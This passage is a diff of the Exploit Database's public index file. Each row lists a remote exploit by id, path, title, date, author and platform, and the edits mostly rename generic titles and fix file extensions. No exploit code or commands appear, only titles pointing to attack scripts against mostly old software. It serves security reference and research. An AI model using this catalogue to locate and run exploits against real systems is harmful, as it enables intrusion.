19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0 40434,platforms/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,php,remote,0 -19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 & SCO Unixware 7.1.1 & SGI IRIX 5.3 & Sun Solaris 2.5.1 - Exploit",1997-11-24,anonymous,linux,remote,0 +19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 / SCO Unixware 7.1.1 / SGI IRIX 5.3 / Sun Solaris 2.5.1 - Privilege Escalation",1997-11-24,anonymous,linux,remote,0 19105,platforms/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 - 'Count.cgi' Buffer Overflow",1997-10-16,"Razvan Dragomirescu",linux,remote,0 19107,platforms/linux/remote/19107.c,"Netscape Messaging Server 3.55 & University of Washington imapd 10.234 - Buffer Overflow",1998-07-17,anonymous,linux,remote,0 19109,platforms/linux/remote/19109.c,"Qualcomm qpopper 2.4 - POP Server Buffer Overflow (1)",1998-06-27,"Seth McGann",linux,remote,0 @@ -11887,9 +11888,9 @@ id,file,description,date,author,platform,type,port 19112,platforms/linux/remote/19112.c,"ISC BIND (Multiple OSes) - Buffer Overflow (2)",1998-04-08,prym,linux,remote,0 19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - TelnetD",1999-01-02,"Tomas Halgas",windows,remote,23 19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",multiple,remote,0 -19119,platforms/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon - Exploit",1998-07-06,"RSI Advise",linux,remote,0 +19119,platforms/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon - Remote Overflow",1998-07-06,"RSI Advise",linux,remote,0 19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 - Handling of ISINDEX Query",1998-07-06,"Luz Pinto",multiple,remote,0 -19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 - Exploit",1998-07-08,"Albert Nubdy",multiple,remote,0 +19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 - Command Execution",1998-07-08,"Albert Nubdy",multiple,remote,0 19123,platforms/linux/remote/19123.c,"SCO Open Server 5.0.4 - POP Server Buffer Overflow",1998-07-13,"Vit Andrusevich",linux,remote,0 19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D - symlink Exploit",1998-07-15,emffmmadffsdf,linux,remote,0 19127,platforms/multiple/remote/19127.txt,"Verity Search97 2.1 - Security",1998-07-14,"Stefan Arentz",multiple,remote,0 @@ -11917,7 +11918,7 @@ id,file,description,date,author,platform,type,port 19224,platforms/windows/remote/19224.c,"Computalynx CMail 2.3 - Web File Access",1999-05-25,Marc,windows,remote,0 19226,platforms/linux/remote/19226.c,"University of Washington pop2d 4.4 - Buffer Overflow",1999-05-26,"Chris Evans",linux,remote,0 19231,platforms/windows/remote/19231.rb,"PHP 5.4.3 - apache_request_headers Function Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,remote,0 -19236,platforms/solaris/remote/19236.txt,"Solaris 7.0 Coredump - Exploit",1996-08-03,"Jungseok Roh",solaris,remote,0 +19236,platforms/solaris/remote/19236.txt,"Solaris 7.0 - 'Coredump' File Write",1996-08-03,"Jungseok Roh",solaris,remote,0 19237,platforms/aix/remote/19237.txt,"Gordano NTMail 3.0/5.0 - SPAM Relay",1999-06-08,Geo,aix,remote,0 19239,platforms/windows/remote/19239.txt,"Microsoft IIS (Windows NT 4.0/SP1/SP2/SP3/SP4/SP5) - '.IDC' Path Mapping",1999-06-04,"Scott Danahy",windows,remote,0 19242,platforms/multiple/remote/19242.txt,"CdomainFree 2.4 - Remote Command Execution",1999-06-01,"Salvatore Sanfilippo -antirez-",multiple,remote,0 @@ -11932,14 +11933,14 @@ id,file,description,date,author,platform,type,port 19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer 6.4.017 - Stack Buffer Overflow (Metasploit)",2012-06-19,Metasploit,windows,remote,0 19295,platforms/windows/remote/19295.rb,"Adobe Flash Player - AVM Verification Logic Array Indexing Code Execution (Metasploit)",2012-06-20,Metasploit,windows,remote,0 19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal",1999-11-04,"Ussr Labs",windows,remote,0 -19297,platforms/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 sdrd - Exploit",1998-08-05,"Chuck Athey & Jim Garlick",linux,remote,0 -19298,platforms/multiple/remote/19298.txt,"SGI IRIX 6.2 cgi-bin wrap - Exploit",1997-04-19,"J.A. Gutierrez",multiple,remote,0 +19297,platforms/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 - 'sdrd' File Read",1998-08-05,"Chuck Athey & Jim Garlick",linux,remote,0 +19298,platforms/multiple/remote/19298.txt,"SGI IRIX 6.2 - cgi-bin wrap Exploit",1997-04-19,"J.A. Gutierrez",multiple,remote,0 19299,platforms/multiple/remote/19299.txt,"SGI IRIX 6.3 - cgi-bin 'webdist.cgi' Exploit",1997-05-06,anonymous,multiple,remote,0 19303,platforms/multiple/remote/19303.txt,"SGI IRIX 6.4 - cgi-bin handler Exploit",1997-06-16,"Razvan Dragomirescu",multiple,remote,0 -19316,platforms/irix/remote/19316.c,"SGI IRIX 6.5.2 nsd - Exploit",1999-05-31,"Jefferson Ogata",irix,remote,0 +19316,platforms/irix/remote/19316.c,"SGI IRIX 6.5.2 - 'nsd'' Exploit",1999-05-31,"Jefferson Ogata",irix,remote,0 19322,platforms/windows/remote/19322.rb,"Apple iTunes 10.6.1.7 - Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,windows,remote,0 19327,platforms/solaris/remote/19327.c,"Sun Solaris 2.5.1 - rpc.statd rpc Call Relaying",1999-06-07,anonymous,solaris,remote,0 -19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 - login(1) Exploit",1996-12-04,anonymous,aix,remote,0 +19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 - 'login(1)' Exploit",1996-12-04,anonymous,aix,remote,0 19407,platforms/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0 19361,platforms/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 - Double Byte Code Page",1999-06-24,Microsoft,windows,remote,0 19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 - Fasttrack Root Directory Listing",1999-06-07,"Jesús López de Aguileta",multiple,remote,0 @@ -11951,16 +11952,16 @@ id,file,description,date,author,platform,type,port 19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS Exploit (1)",1999-07-19,"rain forest puppy",windows,remote,0 19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0 / SGI IRIX 6.5.4 / SGI UNICOS 10.0 6 - arrayd.auth Default Configuration",1999-07-19,"Last Stage of Delirium",multiple,remote,0 19435,platforms/windows/remote/19435.html,"Microsoft JET 3.5/3.51/4.0 - VBA Shell",1999-07-29,BrootForce,windows,remote,0 -19442,platforms/windows/remote/19442.html,"Compaq Java Applet for Presario SpawnApp - Exploit",1998-11-28,"Frank Farance",windows,remote,0 +19442,platforms/windows/remote/19442.html,"Compaq Java Applet for Presario SpawnApp - Code Execution",1998-11-28,"Frank Farance",windows,remote,0 19443,platforms/multiple/remote/19443.txt,"Netscape Enterprise Server 3.51/3.6 - JHTML View Source",1999-07-30,"David Litchfield",multiple,remote,0 -19444,platforms/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0 - Exploit",1999-08-05,"Stefan Lauda",hardware,remote,0 +19444,platforms/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0 - Command Execution",1999-08-05,"Stefan Lauda",hardware,remote,0 19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Buffer Overflow",1999-08-03,UNYUN,windows,remote,0 19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R - 'Topic' Buffer Overflow",1999-08-03,UNYUN,windows,remote,0 19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 - Buffer Overflow",1999-08-08,UNYUN,windows,remote,0 19451,platforms/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP Exploit",1999-08-11,L0pth,multiple,remote,0 19458,platforms/linux/remote/19458.c,"Linux Kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing",1999-07-31,Nergal,linux,remote,0 19459,platforms/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 - Buffer Overflow",1999-08-13,"jduck & stranjer",multiple,remote,0 -19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Exploit",1999-08-18,"Gregory Duchemin",multiple,remote,0 +19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Information Disclosure",1999-08-18,"Gregory Duchemin",multiple,remote,0 19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5 - ActiveX 'Object for constructing type libraries for scriptlets'",1999-08-21,"Georgi Guninski",windows,remote,0 19475,platforms/linux/remote/19475.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0 19476,platforms/linux/remote/19476.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0 @@ -11983,7 +11984,7 @@ id,file,description,date,author,platform,type,port 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth & S. Krahmer",linux,remote,0 19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5 - Download Behaviour",1999-09-27,"Georgi Guninski",windows,remote,0 -19532,platforms/aix/remote/19532.pl,"IBM AIX 4.3.2 ftpd - Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0 +19532,platforms/aix/remote/19532.pl,"IBM AIX 4.3.2 - 'ftpd' Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote,0 19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",windows,remote,0 19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],hardware,remote,0 19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - iFrame Exploit",1999-10-11,"Georgi Guninski",windows,remote,0 @@ -12048,7 +12049,7 @@ id,file,description,date,author,platform,type,port 19686,platforms/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 - external.NavigateAndFind() Cross-Frame",1999-12-22,"Georgi Guninski",multiple,remote,0 19688,platforms/windows/remote/19688.txt,"ZBServer Pro 1.5 - Buffer Overflow (1)",1999-12-23,"Ussr Labs",windows,remote,0 19689,platforms/windows/remote/19689.c,"ZBServer Pro 1.5 - Buffer Overflow (2)",1999-12-23,Izan,windows,remote,0 -19690,platforms/unix/remote/19690.txt,"glFTPd 1.17.2 - Exploit",1999-12-23,suid,unix,remote,0 +19690,platforms/unix/remote/19690.txt,"glFTPd 1.17.2 - Code Execution",1999-12-23,suid,unix,remote,0 19691,platforms/multiple/remote/19691.pl,"Tony Greenwood WebWho+ 1.1 - Remote Command Execution",1999-12-26,loophole,multiple,remote,0 19694,platforms/unix/remote/19694.txt,"AltaVista Search Intranet 2.0 b/2.3 - Directory Traversal",1999-12-29,"Rudi Carell",unix,remote,0 19696,platforms/solaris/remote/19696.c,"Hughes Technologies Mini SQL (mSQL) 2.0.11 - 'w3-msql' Buffer Overflow",1999-10-28,Zhodiac,solaris,remote,0 @@ -12126,7 +12127,7 @@ id,file,description,date,author,platform,type,port 19893,platforms/windows/remote/19893.c,"L-Soft Listserv 1.8 - Web Archives Buffer Overflow",2000-05-01,"David Litchfield",windows,remote,0 19895,platforms/windows/remote/19895.txt,"NetWin DNews 5.3 Server - Buffer Overflow",2000-03-01,Joey__,windows,remote,0 19897,platforms/windows/remote/19897.txt,"FrontPage 2000 / IIS 4.0/5.0 - Server Extensions Full Path Disclosure",2000-05-06,"Frankie Zie",windows,remote,0 -19901,platforms/hardware/remote/19901.txt,"Netopia R-series routers 4.6.2 - Exploit",2000-05-16,"Stephen Friedl",hardware,remote,0 +19901,platforms/hardware/remote/19901.txt,"Netopia R-series Routers 4.6.2 - Modifying SNMP Tables",2000-05-16,"Stephen Friedl",hardware,remote,0 19906,platforms/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 - Environmental Variables Disclosure",2000-05-10,"Black Watch Labs",multiple,remote,0 19908,platforms/windows/remote/19908.txt,"Microsoft IIS 4.0/5.0 - Malformed Filename Request",2000-05-11,"Cerberus Security Team",windows,remote,0 19909,platforms/cgi/remote/19909.pl,"Mozilla Bugzilla 2.4/2.6/2.8/2.10 - Arbitrary Command Execution",2000-05-11,"Frank van Vliet karin",cgi,remote,0 @@ -12199,7 +12200,7 @@ id,file,description,date,author,platform,type,port 20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - 'pbcontrol.php' Root Remote Code Execution",2012-07-24,muts,linux,remote,0 20089,platforms/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 - Source Fragment Disclosure",2000-07-17,"Zuo Lei",windows,remote,0 20091,platforms/multiple/remote/20091.txt,"Stalker CommuniGate Pro 3.2.4 - Arbitrary File Read",2000-04-03,S21Sec,multiple,remote,0 -20095,platforms/multiple/remote/20095.txt,"Sun Java Web Server 1.1.3/2.0 Servlets - Exploit",2000-07-20,"kevin j",multiple,remote,0 +20095,platforms/multiple/remote/20095.txt,"Sun Java Web Server 1.1.3/2.0 Servlets - information Disclosure",2000-07-20,"kevin j",multiple,remote,0 20096,platforms/windows/remote/20096.txt,"Microsoft IIS 2.0/3.0/4.0/5.0/5.1 - Internal IP Address Disclosure",2000-07-13,"Dougal Campbell",windows,remote,0 20097,platforms/multiple/remote/20097.txt,"IBM Websphere Application Server 2.0./3.0/3.0.2.1 - Showcode",2000-07-24,"Shreeraj Shah",multiple,remote,0 20103,platforms/windows/remote/20103.txt,"AnalogX SimpleServer:WWW 1.0.6 - Directory Traversal",2000-07-26,"Foundstone Inc.",windows,remote,0 @@ -12491,7 +12492,7 @@ id,file,description,date,author,platform,type,port 20725,platforms/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x - Arbitrary Commands",2001-04-02,"UkR hacking team",cgi,remote,0 20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 - File Existence Disclosure",2001-04-03,"Rob Beck",windows,remote,0 20727,platforms/linux/remote/20727.c,"NTPd - Remote Buffer Overflow",2001-04-04,"babcia padlina ltd",linux,remote,0 -20730,platforms/unix/remote/20730.c,"IPFilter 3.x - Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",unix,remote,0 +20730,platforms/unix/remote/20730.txt,"IPFilter 3.x - Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",unix,remote,0 20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0 20732,platforms/freebsd/remote/20732.pl,"FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow",2001-04-16,"Elias Levy",freebsd,remote,0 20733,platforms/openbsd/remote/20733.c,"OpenBSD 2.x < 2.8 FTPd - 'glob()' Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote,0 @@ -12616,7 +12617,7 @@ id,file,description,date,author,platform,type,port 21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 4 Securemote - Network Information Leak",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0 21019,platforms/linux/remote/21019.txt,"Horde 1.2.x/2.1.3 and Imp 2.2.x/3.1.2 - File Disclosure",2001-07-13,"Caldera Open Linux",linux,remote,0 21021,platforms/unix/remote/21021.pl,"SSH2 3.0 - Short Password Login",2001-07-21,hypoclear,unix,remote,0 -21023,platforms/cgi/remote/21023.c,"CGIWrap 2.x/3.x - Cross-Site Scripting",2001-07-22,"TAKAGI Hiromitsu",cgi,remote,0 +21023,platforms/cgi/remote/21023.txt,"CGIWrap 2.x/3.x - Cross-Site Scripting",2001-07-22,"TAKAGI Hiromitsu",cgi,remote,0 21025,platforms/multiple/remote/21025.txt,"Proxomitron Naoko-4 - Cross-Site Scripting",2001-07-24,"TAKAGI Hiromitsu",multiple,remote,0 21026,platforms/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 - 'pagecount' File Overwrite",2001-07-22,kyprizel,multiple,remote,0 21027,platforms/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 - Insecure Default Password Protection",2001-07-25,3APA3A,multiple,remote,0 @@ -12638,7 +12639,7 @@ id,file,description,date,author,platform,type,port 21080,platforms/multiple/remote/21080.rb,"JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit)",2012-09-05,Metasploit,multiple,remote,0 21088,platforms/unix/remote/21088.pl,"AOLServer 3 - 'Authentication String' Buffer Overflow (1)",2001-08-22,"Nate Haggard",unix,remote,0 21089,platforms/unix/remote/21089.c,"AOLServer 3 - 'Authentication String' Buffer Overflow (2)",2001-09-05,qitest1,unix,remote,0 -21093,platforms/aix/remote/21093.c,"AIX 4.1/4.2 - pdnsd Buffer Overflow",1999-08-17,"Last Stage of Delirium",aix,remote,0 +21093,platforms/aix/remote/21093.c,"AIX 4.1/4.2 - 'pdnsd' Buffer Overflow",1999-08-17,"Last Stage of Delirium",aix,remote,0 21095,platforms/linux/remote/21095.txt,"RedHat 6.2/7.0/7.1 Lpd - Remote Command Execution via DVI Printfilter Configuration Error",2001-08-27,"zenith parsec",linux,remote,0 21097,platforms/solaris/remote/21097.txt,"Solaris 2.x/7.0/8 LPD - Remote Command Execution",2001-08-31,ron1n,solaris,remote,0 21100,platforms/multiple/remote/21100.pl,"Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Detection Evasion",2001-09-05,blackangels,multiple,remote,0 @@ -12646,7 +12647,7 @@ id,file,description,date,author,platform,type,port 21104,platforms/cgi/remote/21104.pl,"Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution",2001-09-08,"Alexey Sintsov",cgi,remote,0 21109,platforms/windows/remote/21109.c,"EFTP 2.0.7 337 - Buffer Overflow Code Execution / Denial of Service",2001-09-12,byterage,windows,remote,0 21110,platforms/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory Existence / File Existence",2001-09-12,byterage,windows,remote,0 -21112,platforms/linux/remote/21112.php,"RedHat Linux 7.0 Apache - Remote 'Username' Enumeration",2001-09-12,"Gabriel A Maggiotti",linux,remote,0 +21112,platforms/linux/remote/21112.php,"RedHat Linux 7.0 Apache - Remote Username Enumeration",2001-09-12,"Gabriel A Maggiotti",linux,remote,0 21113,platforms/windows/remote/21113.txt,"Microsoft Index Server 2.0 - File Information / Full Path Disclosure",2001-09-14,"Syed Mohamed",windows,remote,0 21115,platforms/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0 21116,platforms/multiple/remote/21116.pl,"Amtote Homebet - Account Information Brute Force",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0 @@ -13338,7 +13339,7 @@ id,file,description,date,author,platform,type,port 23366,platforms/linux/remote/23366.c,"Epic 1.0.1/1.0.x - CTCP Nickname Server Message Buffer Overrun",2003-11-10,Li0n7,linux,remote,0 23368,platforms/linux/remote/23368.c,"Winace UnAce 2.2 - Command Line Argument Buffer Overflow (1)",2003-11-10,demz,linux,remote,0 23369,platforms/linux/remote/23369.c,"Winace UnAce 2.2 - Command Line Argument Buffer Overflow (2)",2003-11-10,Li0n7,linux,remote,0 -23371,platforms/linux/remote/23371.c,"Hylafax 4.1.x - HFaxD Unspecified Format String",2003-11-10,"Sebastian Krahmer",linux,remote,0 +23371,platforms/linux/remote/23371.c,"Hylafax 4.1.x - HFaxD Format String",2003-11-10,"Sebastian Krahmer",linux,remote,0 23373,platforms/windows/remote/23373.html,"Opera Web Browser 7.x - URI Handler Directory Traversal",2003-11-12,S.G.Masood,windows,remote,0 23376,platforms/hardware/remote/23376.txt,"Fortigate Firewall 2.x - dlg Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 23377,platforms/hardware/remote/23377.txt,"Fortigate Firewall 2.x - Policy Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 @@ -13354,7 +13355,7 @@ id,file,description,date,author,platform,type,port 23405,platforms/multiple/remote/23405.c,"Applied Watch Command Center 1.0 - Authentication Bypass (2)",2003-11-28,"Bugtraq Security",multiple,remote,0 23411,platforms/windows/remote/23411.txt,"Websense Enterprise 4/5 - Blocked Sites Cross-Site Scripting",2003-12-03,"Mr. P.Taylor",windows,remote,0 23413,platforms/linux/remote/23413.c,"PLD Software Ebola 0.1.4 - Buffer Overflow",2003-12-05,c0wboy,linux,remote,0 -23417,platforms/windows/remote/23417.c,"EZMeeting 3.x - 'EZNet.exe' Long HTTP Request Remote Buffer Overflow",2003-12-08,kralor,windows,remote,0 +23417,platforms/windows/remote/23417.pl,"EZMeeting 3.x - 'EZNet.exe' Long HTTP Request Remote Buffer Overflow",2003-12-08,kralor,windows,remote,0 23419,platforms/windows/remote/23419.txt,"Abyss Web Server 1.0/1.1 - Authentication Bypass",2003-12-08,"Luigi Auriemma",windows,remote,0 23422,platforms/windows/remote/23422.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0 23423,platforms/windows/remote/23423.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",windows,remote,0 @@ -13534,7 +13535,7 @@ id,file,description,date,author,platform,type,port 24116,platforms/windows/remote/24116.txt,"Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification",2004-05-13,"Karol Wiesek",windows,remote,0 24117,platforms/windows/remote/24117.txt,"Microsoft Internet Explorer 6 - Codebase Double Backslash Local Zone File Execution",2003-11-25,"Liu Die Yu",windows,remote,0 24118,platforms/windows/remote/24118.txt,"Microsoft Outlook Express 6.0 - URI Obfuscation",2004-05-13,http-equiv,windows,remote,0 -24120,platforms/linux/remote/24120.c,"LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0 +24120,platforms/linux/remote/24120.pl,"LHA 1.x - 'extract_one' Multiple Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0 24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0 24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0 24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - GET Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 @@ -13570,7 +13571,7 @@ id,file,description,date,author,platform,type,port 24249,platforms/windows/remote/24249.html,"Microsoft Internet Explorer 6 - Shell.Application Object Script Execution",2004-07-03,http-equiv,windows,remote,0 24250,platforms/multiple/remote/24250.pl,"MySQL 4.1/5.0 - Authentication Bypass",2004-07-05,"Eli Kara",multiple,remote,0 24253,platforms/multiple/remote/24253.txt,"12Planet Chat Server 2.9 - Cross-Site Scripting",2004-07-05,"Donato Ferrante",multiple,remote,0 -24259,platforms/linux/remote/24259.c,"Ethereal 0.x - Multiple Unspecified iSNS / SMB / SNMP Protocol Dissector Vulnerabilities",2004-08-05,"Rémi Denis-Courmont",linux,remote,0 +24259,platforms/linux/remote/24259.c,"Ethereal 0.x - Multiple iSNS / SMB / SNMP Protocol Dissector Vulnerabilities",2004-08-05,"Rémi Denis-Courmont",linux,remote,0 24262,platforms/windows/remote/24262.html,"Opera Web Browser 7.5x - IFrame OnLoad Address Bar URL Obfuscation",2004-07-08,"bitlance winter",windows,remote,0 24263,platforms/windows/remote/24263.txt,"Mozilla 1.7 - External Protocol Handler",2004-07-08,"Keith McCanless",windows,remote,0 24264,platforms/multiple/remote/24264.java,"Sun Java Virtual Machine 1.x - 'Font.createFont' Method Insecure Temporary File Creation",2004-07-09,Jelmer,multiple,remote,0 @@ -13601,7 +13602,7 @@ id,file,description,date,author,platform,type,port 24342,platforms/cgi/remote/24342.txt,"Webcam Corp Webcam Watchdog 4.0.1 - 'sresult.exe' Cross-Site Scripting",2004-08-02,dr_insane,cgi,remote,0 24345,platforms/windows/remote/24345.txt,"IBM Tivoli Directory Server 3.2.2/4.1 - LDACGI Directory Traversal",2004-08-02,anonymous,windows,remote,0 24350,platforms/windows/remote/24350.txt,"Acme thttpd 2.0.7 - Directory Traversal",2004-08-04,CoolICE,windows,remote,0 -24353,platforms/unix/remote/24353.sql,"Oracle 9i - Multiple Unspecified Vulnerabilities",2004-08-04,"Marco Ivaldi",unix,remote,0 +24353,platforms/unix/remote/24353.sql,"Oracle 9i - Multiple Vulnerabilities",2004-08-04,"Marco Ivaldi",unix,remote,0 24354,platforms/windows/remote/24354.txt,"Microsoft Internet Explorer 6 - mms Protocol Handler Executable Command Line Injection",2004-08-05,"Nicolas Robillard",windows,remote,0 24361,platforms/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (2)",2004-08-09,jsk,linux,remote,0 24363,platforms/windows/remote/24363.txt,"clearswift MIMEsweeper for Web 4.0/5.0 - Directory Traversal",2004-07-11,"Kroma Pierre",windows,remote,0 @@ -13678,7 +13679,7 @@ id,file,description,date,author,platform,type,port 24760,platforms/hardware/remote/24760.txt,"ZYXEL 3 Prestige Router - HTTP Remote Administration Configuration Reset",2004-11-22,"Francisco Canela",hardware,remote,0 24767,platforms/windows/remote/24767.txt,"Raven Software Soldier Of Fortune 2 - Buffer Overflow",2004-11-23,"Luigi Auriemma",windows,remote,0 24774,platforms/multiple/remote/24774.java,"Open DC Hub 0.7.14 - Remote Buffer Overflow",2004-11-24,"Donato Ferrante",multiple,remote,0 -24784,platforms/linux/remote/24784.txt,"File ELF 4.x - Header Unspecified Buffer Overflow",2004-11-29,anonymous,linux,remote,0 +24784,platforms/linux/remote/24784.txt,"File ELF 4.x - Header Buffer Overflow",2004-11-29,anonymous,linux,remote,0 24813,platforms/linux/remote/24813.pl,"GNU Wget 1.x - Multiple Vulnerabilities",2004-12-10,"Jan Minar",linux,remote,0 24794,platforms/linux/remote/24794.sh,"SCPOnly 2.x/3.x - Arbitrary Command Execution",2004-12-02,"Jason Wies",linux,remote,0 24795,platforms/linux/remote/24795.txt,"RSSH 2.x - Arbitrary Command Execution",2004-12-02,"Jason Wies",linux,remote,0 @@ -14097,8 +14098,8 @@ id,file,description,date,author,platform,type,port 28198,platforms/windows/remote/28198.py,"Microsoft Office 2000/2002 - Property Code Execution",2006-07-11,anonymous,windows,remote,0 28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - 'player.php?url' Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 28210,platforms/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 -28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 - 'mso.dll' .PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0 -28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 - 'powerpnt.exe' Unspecified Issue",2006-07-14,"naveed afzal",windows,remote,0 +28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 - 'mso.dll' '.PPT' Processing Code Execution",2006-07-14,"naveed afzal",windows,remote,0 +28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 - 'powerpnt.exe' Exploit",2006-07-14,"naveed afzal",windows,remote,0 28226,platforms/windows/remote/28226.c,"Microsoft PowerPoint 2003 - '.ppt' File Closure Memory Corruption",2006-07-14,"naveed afzal",windows,remote,0 28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x - LHA Filename Handling Buffer 